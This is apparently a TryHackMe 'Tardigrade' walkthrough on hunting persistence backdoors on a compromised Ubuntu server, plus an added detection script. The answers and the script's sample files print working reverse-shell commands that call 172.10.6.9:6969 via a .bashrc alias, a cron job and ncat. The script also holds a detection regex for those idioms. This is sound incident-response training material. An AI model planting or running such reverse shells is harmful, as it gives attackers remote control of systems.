Tardigrade

TryHackMe Challenge Walkthrough

Challenge Overview

A server has been compromised, and the security team has decided to isolate the machine until it’s been thoroughly cleaned up. Initial checks by the Incident Response team revealed that there are five different backdoors. It’s your job to find and remediate them before giving the signal to bring the server back to production.

Q & A

Q1 What is the server's OS version?

Let's start by connecting to the server over SSH; the banner and /etc/os-release give the version.

Answer

Ubuntu 20.04.4 LTS

Q2 What's the most interesting file you found in giorgio's home directory?

I would say that anything starting with .bad is interesting, or at least a red flag.

Answer

.bad_bash

Q3 Another file that can be found in every user's home directory is the .bashrc file. Can you check if you can find something interesting in giorgio's .bashrc?

Let's open the .bashrc file and check it:

bash:

nano .bashrc

Answer

 ls='(bash -i >& /dev/tcp/172.10.6.9/6969 0>&1 & disown) 2>/dev/null; ls --color=auto'

Q4 It seems we've covered the usual bases in giorgio's home directory, so it's time to check the scheduled tasks that he owns. Did you find anything interesting about scheduled tasks?
Answer

 /usr/bin/rm /tmp/f;/usr/bin/mkfifo /tmp/f;/usr/bin/cat /tmp/f|/bin/sh -i 2>&1|/usr/bin/nc 172.10.6.9 6969 >/tmp/f

Q5 This section is a bonus discussion on the importance of a dirty wordlist. Accept the extra point and happy hunting!
Answer

THM{d1rty_w0rdl1st}

Q6 A few moments after logging on to the root account, you find an error message in your terminal. What does it say?
Answer

Ncat: TIMEOUT.

Q7 After moving forward with the error message, a suspicious command appears in the terminal as part of the error message. What command was displayed?
Answer

ncat -e /bin/bash 172.10.6.9 6969

Q8 Can you find out how the suspicious command has been implemented?
Answer

.bashrc

Q9 What is the last persistence mechanism?

Check /etc/passwd to see which accounts exist on the system and which of them have a real login shell.

Answer

nobody

Q10 The adversary left a golden nugget of "advise" somewhere. What is the nugget?

From the previous question we know that the nobody account's home directory is /nonexistent.

Let's see what is inside it: we find a file named .youfoundme, and cat-ing it gives us the flag.

Answer

THM{Nob0dy_1s_s@f3}
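The three mechanisms found above (a reverse shell hidden in a .bashrc alias, a reverse shell in a cron job, and a system account handed a login shell) are all things a triage script can hunt for. The script below is an added example and is not part of the TryHackMe room or this walkthrough; the sample .bashrc, crontab and passwd files are constructed from the findings on this page so it runs offline, and the regex and the "system account" heuristic are assumptions of the example.

```sh
#!/bin/sh
# Added example (not part of the TryHackMe room): hunt for the three persistence
# mechanisms this box uses. The sample files are constructed from the walkthrough's
# findings so the script runs offline; on a live host point the functions at
# /home/*/.bashrc, /root/.bashrc, /var/spool/cron/crontabs/* and /etc/passwd.

# Extended regex for the reverse-shell idioms seen on the box (heuristic): bash's
# /dev/tcp pseudo-device, nc/ncat with -e, and the mkfifo|sh|nc pipe.
REVSHELL_RE='/dev/tcp/|(^|[^[:alnum:]_])n(c|cat) .*-e |mkfifo'

# scan_file FILE: print matching lines with line numbers; exit status 1 if none
scan_file() {
    grep -nE "$REVSHELL_RE" "$1"
}

# count_hits FILE: number of suspicious lines, always printed as an integer
count_hits() {
    grep -cE "$REVSHELL_RE" "$1" || true
}

# shell_accounts PASSWD: accounts that look like system accounts (uid < 1000, or the
# 65534 nobody range) but have an interactive shell instead of nologin/false/sync/etc.
shell_accounts() {
    awk -F: '$1 != "root" && ($3 < 1000 || $3 >= 65000) &&
             $7 !~ /(nologin|false|sync|halt|shutdown)$/ { print $1 ":" $6 ":" $7 }' "$1"
}

# Constructed samples (assumed content, modelled on the findings above).
TMP=$(mktemp -d)
trap 'rm -rf "$TMP"' EXIT

cat > "$TMP/giorgio.bashrc" <<'EOF'
# ~/.bashrc: the first alias is the backdoor, the rest is stock
alias ls='(bash -i >& /dev/tcp/172.10.6.9/6969 0>&1 & disown) 2>/dev/null; ls --color=auto'
alias ll='ls -alF'
alias grep='grep --color=auto'
EOF

cat > "$TMP/giorgio.cron" <<'EOF'
# m h dom mon dow command
* * * * * /usr/bin/rm /tmp/f;/usr/bin/mkfifo /tmp/f;/usr/bin/cat /tmp/f|/bin/sh -i 2>&1|/usr/bin/nc 172.10.6.9 6969 >/tmp/f
EOF

cat > "$TMP/root.bashrc" <<'EOF'
# /root/.bashrc
export PATH=$PATH:/usr/local/sbin
ncat -e /bin/bash 172.10.6.9 6969
EOF

cat > "$TMP/clean.bashrc" <<'EOF'
alias ls='ls --color=auto'
alias ll='ls -alF'
EOF

cat > "$TMP/passwd" <<'EOF'
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
nobody:x:65534:65534:nobody:/nonexistent:/bin/bash
giorgio:x:1000:1000:,,,:/home/giorgio:/bin/bash
EOF

# report: run every check against the samples; returns 1 if anything was found,
# so a caller can gate "back to production" on its exit status.
report() {
    found=0
    for f in "$TMP/giorgio.bashrc" "$TMP/giorgio.cron" "$TMP/root.bashrc" "$TMP/clean.bashrc"; do
        if hits=$(scan_file "$f"); then
            printf '%s: suspicious lines\n%s\n' "$f" "$hits"
            found=1
        fi
    done
    accts=$(shell_accounts "$TMP/passwd")
    if [ -n "$accts" ]; then
        printf 'system accounts with a login shell (user:home:shell):\n%s\n' "$accts"
        found=1
    fi
    return $found
}

report || printf 'findings present: remediate before returning the box to production\n'
```

The regex is deliberately narrow (the idioms on this box plus nc/ncat with -e); on a real engagement extend it with whatever the adversary's tooling looks like, and remember that aliases can also live in .bash_aliases, .profile and /etc/bash.bashrc, and cron entries in /etc/cron.d and the systemd timer directories.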

Conclusion

Sometimes, adversaries don’t need malware — just a few cron jobs, a backdoored .bashrc, and a creative alias. This challenge was a reminder that persistence isn’t always fancy… it’s often just hiding in plain sight.

$ Whoami

Cybersecurity learner, log nerd, and TryHackMe badge hoarder. Let’s connect on LinkedIn before I get pulled into another packet capture.